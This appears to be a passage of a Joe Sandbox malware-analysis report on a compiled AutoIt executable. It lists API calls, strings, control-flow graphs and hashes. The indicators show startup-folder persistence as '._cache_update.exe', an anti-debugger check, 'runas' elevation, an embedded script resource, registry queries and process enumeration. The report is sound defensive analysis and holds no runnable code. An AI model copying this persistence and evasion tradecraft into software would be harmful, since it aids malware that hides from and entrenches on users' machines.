106335 1ed3d2 48 API calls 106334->106335 106336 1e1693 106335->106336 106336->106286 106337->106313

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 001E374E Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 145windowCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 001E376D
                                                                                                                                                                    • Part of subcall function 001E4257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,00000104,?,00000000,00000001,00000000), ref: 001E428C
                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?), ref: 001E377F
                                                                                                                                                                  • GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,00000104,?,002A1120,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,002A1124,?,?), ref: 001E37EE
                                                                                                                                                                    • Part of subcall function 001E34F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 001E352A
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 001E3860
                                                                                                                                                                  • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00292934,00000010), ref: 002521C5
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?), ref: 002521FD
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00252232
                                                                                                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0027DAA4), ref: 00252290
                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000), ref: 00252297
                                                                                                                                                                    • Part of subcall function 001E30A5: GetSysColorBrush.USER32(0000000F), ref: 001E30B0
                                                                                                                                                                    • Part of subcall function 001E30A5: LoadCursorW.USER32(00000000,00007F00), ref: 001E30BF
                                                                                                                                                                    • Part of subcall function 001E30A5: LoadIconW.USER32(00000063), ref: 001E30D5
                                                                                                                                                                    • Part of subcall function 001E30A5: LoadIconW.USER32(000000A4), ref: 001E30E7
                                                                                                                                                                    • Part of subcall function 001E30A5: LoadIconW.USER32(000000A2), ref: 001E30F9
                                                                                                                                                                    • Part of subcall function 001E30A5: RegisterClassExW.USER32(?), ref: 001E3167
                                                                                                                                                                    • Part of subcall function 001E2E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001E2ECB
                                                                                                                                                                    • Part of subcall function 001E2E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 001E2EEC
                                                                                                                                                                    • Part of subcall function 001E2E9D: ShowWindow.USER32(00000000), ref: 001E2F00
                                                                                                                                                                    • Part of subcall function 001E2E9D: ShowWindow.USER32(00000000), ref: 001E2F09
                                                                                                                                                                    • Part of subcall function 001E3598: _memset.LIBCMT ref: 001E35BE
                                                                                                                                                                    • Part of subcall function 001E3598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 001E3667
                                                                                                                                                                  Strings
                                                                                                                                                                  • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 002521BE
                                                                                                                                                                  • runas, xrefs: 0025228B
                                                                                                                                                                  • "*, xrefs: 001E379D
                                                                                                                                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, xrefs: 001E37B4, 001E37E9, 001E37FD, 00252257
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas$"*
                                                                                                                                                                  • API String ID: 4253510256-2116851977
                                                                                                                                                                  • Opcode ID: 821eb199e023f6f897f05b9856e02bd57f050cabef41732985ea5aefe8008918
                                                                                                                                                                  • Instruction ID: ae19c2d06f91b0903c5880bacde2bec8b66db9cab4251e765b5a9a0ce1b407c6
                                                                                                                                                                  • Opcode Fuzzy Hash: 821eb199e023f6f897f05b9856e02bd57f050cabef41732985ea5aefe8008918
                                                                                                                                                                  • Instruction Fuzzy Hash: CA512670A04684BBCF10ABA2EC4EFAD7B789B17714F044165FA55931D1DFB04A69CF22
                                                                                                                                                                  Function 001E29C2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 1173 1e29c2-1e29e2 1175 1e29e4-1e29e7 1173->1175 1176 1e2a42-1e2a44 1173->1176 1178 1e2a48 1175->1178 1179 1e29e9-1e29f0 1175->1179 1176->1175 1177 1e2a46 1176->1177 1180 1e2a2b-1e2a33 NtdllDefWindowProc_W 1177->1180 1181 1e2a4e-1e2a51 1178->1181 1182 252307-252335 call 1e322e call 1fec33 1178->1182 1183 1e2aac-1e2ab4 PostQuitMessage 1179->1183 1184 1e29f6-1e29fb 1179->1184 1185 1e2a39-1e2a3f 1180->1185 1186 1e2a76-1e2a9d SetTimer RegisterClipboardFormatW 1181->1186 1187 1e2a53-1e2a54 1181->1187 1220 25233a-252341 1182->1220 1191 1e2a72-1e2a74 1183->1191 1189 25238f-2523a3 call 2257fb 1184->1189 1190 1e2a01-1e2a03 1184->1190 1186->1191 1195 1e2a9f-1e2aaa CreatePopupMenu 1186->1195 1192 1e2a5a-1e2a6d KillTimer call 1e2b94 call 1e2ac7 1187->1192 1193 2522aa-2522ad 1187->1193 1189->1191 1215 2523a9 1189->1215 1196 1e2a09-1e2a0e 1190->1196 1197 1e2ab6-1e2ac0 call 1e1e58 1190->1197 1191->1185 1192->1191 1199 2522e3-252302 MoveWindow 1193->1199 1200 2522af-2522b1 1193->1200 1195->1191 1203 252374-25237b 1196->1203 1204 1e2a14-1e2a19 1196->1204 1207 1e2ac5 1197->1207 1199->1191 1208 2522b3-2522b6 1200->1208 1209 2522d2-2522de SetFocus 1200->1209 1203->1180 1211 252381-25238a call 21b31f 1203->1211 1213 1e2a1f-1e2a25 1204->1213 1214 25235f-25236f call 225fdb 1204->1214 1207->1191 1208->1213 1216 2522bc-2522cd call 1e322e 1208->1216 1209->1191 1211->1180 1213->1180 1213->1220 1214->1191 1215->1180 1216->1191 1220->1180 1221 252347-25235a call 1e2b94 call 1e3598 1220->1221 1221->1180
                                                                                                                                                                  APIs
                                                                                                                                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 001E2A33
                                                                                                                                                                  • KillTimer.USER32(?,00000001), ref: 001E2A5D
                                                                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001E2A80
                                                                                                                                                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 001E2A8B
                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 001E2A9F
                                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 001E2AAE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                                                                                                                                  • String ID: TaskbarCreated
                                                                                                                                                                  • API String ID: 157504867-2362178303
                                                                                                                                                                  • Opcode ID: 080d886463850b40694066ffeafd79c3d38809d0db516aaecf2a95ff437004e2
                                                                                                                                                                  • Instruction ID: e25a6ccc4116bc6a3dd53456a0f96973e5dc3541698d12a1cdeb63e48f259a19
                                                                                                                                                                  • Opcode Fuzzy Hash: 080d886463850b40694066ffeafd79c3d38809d0db516aaecf2a95ff437004e2
                                                                                                                                                                  • Instruction Fuzzy Hash: C4412631224ACAABDB286F66FC1DB7D365EE796310F044136F903934A1DFB48C648765
                                                                                                                                                                  Function 002430AD Relevance: 12.4, APIs: 8, Instructions: 397registryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 1667 2430ad-24315b call 1eca8e call 1ed3d2 * 3 call 1e84a6 call 243d7b call 243af7 1682 243166-243170 1667->1682 1683 24315d-243161 1667->1683 1685 2431a2 1682->1685 1686 243172-243187 RegConnectRegistryW 1682->1686 1684 2431e6-2431f2 call 22d7e4 1683->1684 1695 243504-243527 call 1e5cd3 * 3 1684->1695 1690 2431a6-2431c3 RegOpenKeyExW 1685->1690 1688 24319c-2431a0 1686->1688 1689 243189-24319a call 1e7ba9 1686->1689 1688->1690 1689->1684 1693 2431c5-2431d7 call 1e7ba9 1690->1693 1694 2431f7-243227 call 1e84a6 RegQueryValueExW 1690->1694 1704 2431e3-2431e4 1693->1704 1705 2431d9 1693->1705 1702 24323e-243254 call 1e7ba9 1694->1702 1703 243229-243239 call 1e7ba9 1694->1703 1715 2434dc-2434dd 1702->1715 1716 24325a-24325f 1702->1716 1714 2434df-2434e6 call 22d7e4 1703->1714 1704->1684 1705->1704 1722 2434eb-2434fc 1714->1722 1715->1714 1719 243265-243268 1716->1719 1720 24344c-243498 call 20010a call 1e84a6 RegQueryValueExW 1716->1720 1723 24326e-243273 1719->1723 1724 2433d9-243411 call 22ad14 call 1e84a6 RegQueryValueExW 1719->1724 1744 2434b4-2434ce call 1e7ba9 call 22d7e4 1720->1744 1745 24349a-2434a6 1720->1745 1722->1695 1739 2434fe 1722->1739 1727 24338d-2433d4 call 1e84a6 RegQueryValueExW call 1f2570 1723->1727 1728 243279-24327c 1723->1728 1724->1722 1751 243417-243447 call 1e7ba9 call 22d7e4 call 1f2570 1724->1751 1727->1722 1729 2432de-24332b call 20010a call 1e84a6 RegQueryValueExW 1728->1729 1730 24327e-243281 1728->1730 1729->1744 1761 243331-243348 1729->1761 1730->1715 1735 243287-2432d9 call 1e84a6 RegQueryValueExW call 1f2570 1730->1735 1735->1722 1739->1695 1764 2434d3-2434da call 20017e 1744->1764 1750 2434aa-2434b2 call 1eca8e 1745->1750 1750->1764 1751->1722 1761->1750 1765 24334e-243355 1761->1765 1764->1722 1768 243357-243358 1765->1768 1769 24335c-243361 1765->1769 1768->1769 1772 243376-24337b 1769->1772 1773 243363-243367 1769->1773 1772->1750 1776 243381-243388 1772->1776 1774 243371-243374 1773->1774 1775 243369-24336d 1773->1775 1774->1772 1774->1773 1775->1774 1776->1750
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00243AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00242AA6,?,?), ref: 00243B0E
                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0024317F
                                                                                                                                                                    • Part of subcall function 001E84A6: __swprintf.LIBCMT ref: 001E84E5
                                                                                                                                                                    • Part of subcall function 001E84A6: __itow.LIBCMT ref: 001E8519
                                                                                                                                                                  • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 0024321E
                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 002432B6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: QueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 658460102-0
                                                                                                                                                                  • Opcode ID: 4b0969e00fda7d9e11062da49282ee9db6894eae652d30df30285a789e5a6da3
                                                                                                                                                                  • Instruction ID: 8fc3d5dacb5361115452612908c66148d1f4f0d1b965b9cbffdb0615c8a0027f
                                                                                                                                                                  • Opcode Fuzzy Hash: 4b0969e00fda7d9e11062da49282ee9db6894eae652d30df30285a789e5a6da3
                                                                                                                                                                  • Instruction Fuzzy Hash: B0E16B71614211AFCB14DF29C895E6EBBE8EF88324F04856DF44ADB2A1DB30ED11CB52
                                                                                                                                                                  Function 001FE47B Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 001FE4A7
                                                                                                                                                                    • Part of subcall function 001E7E53: _memmove.LIBCMT ref: 001E7EB9
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,0027DC28,?,?), ref: 001FE567
                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32(?,0027DC28,?,?), ref: 001FE5BC
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 001FE5C7
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 001FE5DA
                                                                                                                                                                  • GetSystemInfo.KERNEL32(?,0027DC28,?,?), ref: 001FE5E4
                                                                                                                                                                  • GetSystemInfo.KERNEL32(?,0027DC28,?,?), ref: 001FE5F0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2717633055-0
                                                                                                                                                                  • Opcode ID: 5b6ae027ec173056e888a3940ceade59d61948696c61c23964b019a53f3d14e2
                                                                                                                                                                  • Instruction ID: 8c044e33356748baf170987d5ee256b885b73723a5d6a8c83bfd48cc3e69316c
                                                                                                                                                                  • Opcode Fuzzy Hash: 5b6ae027ec173056e888a3940ceade59d61948696c61c23964b019a53f3d14e2
                                                                                                                                                                  • Instruction Fuzzy Hash: 7E61C2B59192C8CFCF15CF6898C01E97FA46F2A304F2945D9D8489B267D734C90DCB6A
                                                                                                                                                                  Function 001E31F2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 001E3202
                                                                                                                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 001E3219
                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 002557D7
                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 002557EC
                                                                                                                                                                  • LockResource.KERNEL32(?), ref: 002557FF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                  • String ID: SCRIPT
                                                                                                                                                                  • API String ID: 3051347437-3967369404
                                                                                                                                                                  • Opcode ID: 171ec6c8604b14e6ccefa2c92834306a04784d1d77f0fc2f68b487510d8ff2bb
                                                                                                                                                                  • Instruction ID: ae55c243bf4e39a2c53408797f650f453c752788a6fe5d8e32d575bed4d3b26f
                                                                                                                                                                  • Opcode Fuzzy Hash: 171ec6c8604b14e6ccefa2c92834306a04784d1d77f0fc2f68b487510d8ff2bb
                                                                                                                                                                  • Instruction Fuzzy Hash: 93117C74600B46BFE7219B66EC5CF277BB9EBC9B51F208428F95287190DBB1DD008A60
                                                                                                                                                                  Function 00226F5B Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00226F7D
                                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00226F8D
                                                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00226FAC
                                                                                                                                                                  • __wsplitpath.LIBCMT ref: 00226FD0
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00226FE3
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00227022
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1605983538-0
                                                                                                                                                                  • Opcode ID: 849c78b55b9c1b22cc33da2dedbd567d4dbc9dbe8253dfe9980314a30f460577
                                                                                                                                                                  • Instruction ID: aaaccd6959a87a1635b15391ab8bdb9ddcd2c395f5813c3c7242387b9562def1
                                                                                                                                                                  • Opcode Fuzzy Hash: 849c78b55b9c1b22cc33da2dedbd567d4dbc9dbe8253dfe9980314a30f460577
                                                                                                                                                                  • Instruction Fuzzy Hash: 1F215071914229BBDB10AFA0EC88BEEB7BCAB49304F1004E9E505E3151E7B59F94DF60
                                                                                                                                                                  Function 0022EFCD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 002278AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 002278CB
                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 0022F04D
                                                                                                                                                                  • CoCreateInstance.COMBASE(0026DA7C,00000000,00000001,0026D8EC,?), ref: 0022F066
                                                                                                                                                                  • CoUninitialize.COMBASE ref: 0022F083
                                                                                                                                                                    • Part of subcall function 001E84A6: __swprintf.LIBCMT ref: 001E84E5
                                                                                                                                                                    • Part of subcall function 001E84A6: __itow.LIBCMT ref: 001E8519
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                                                                  • String ID: .lnk
                                                                                                                                                                  • API String ID: 2126378814-24824748
                                                                                                                                                                  • Opcode ID: 503b573f336c83eeca8b4ec79e5860c81e3fde4977cf9dd7f7870af3375558cc
                                                                                                                                                                  • Instruction ID: c047040a4dd97860635b834c7525096323513a50f848b73715b0eed75352cac8
                                                                                                                                                                  • Opcode Fuzzy Hash: 503b573f336c83eeca8b4ec79e5860c81e3fde4977cf9dd7f7870af3375558cc
                                                                                                                                                                  • Instruction Fuzzy Hash: 62A14535614312AFC700DF54C984D6ABBF5FF89320F1489A8F89A9B2A1DB31ED45CB91
                                                                                                                                                                  Function 001FDD92 Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileAttributesW.KERNEL32(001EC848,001EC848), ref: 001FDDA2
                                                                                                                                                                  • FindFirstFileW.KERNEL32(001EC848,?), ref: 00254A83
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$AttributesFindFirst
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4185537391-0
                                                                                                                                                                  • Opcode ID: 1aa56d77d554109fc9b32af3aa6ccdd5059df6d8dded744964ec8eb8172fbf11
                                                                                                                                                                  • Instruction ID: f201545f0b95885a7cd81f80cf7c51d2e336adaae9db3899a166fcb7ae76da81
                                                                                                                                                                  • Opcode Fuzzy Hash: 1aa56d77d554109fc9b32af3aa6ccdd5059df6d8dded744964ec8eb8172fbf11
                                                                                                                                                                  • Instruction Fuzzy Hash: 3DE0D8329144095743146778FC0D8F9779C9A0633DB144745F939C10E0E7F09D5486DA
                                                                                                                                                                  Function 001EDCD0 Relevance: 3.5, APIs: 2, Instructions: 540COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
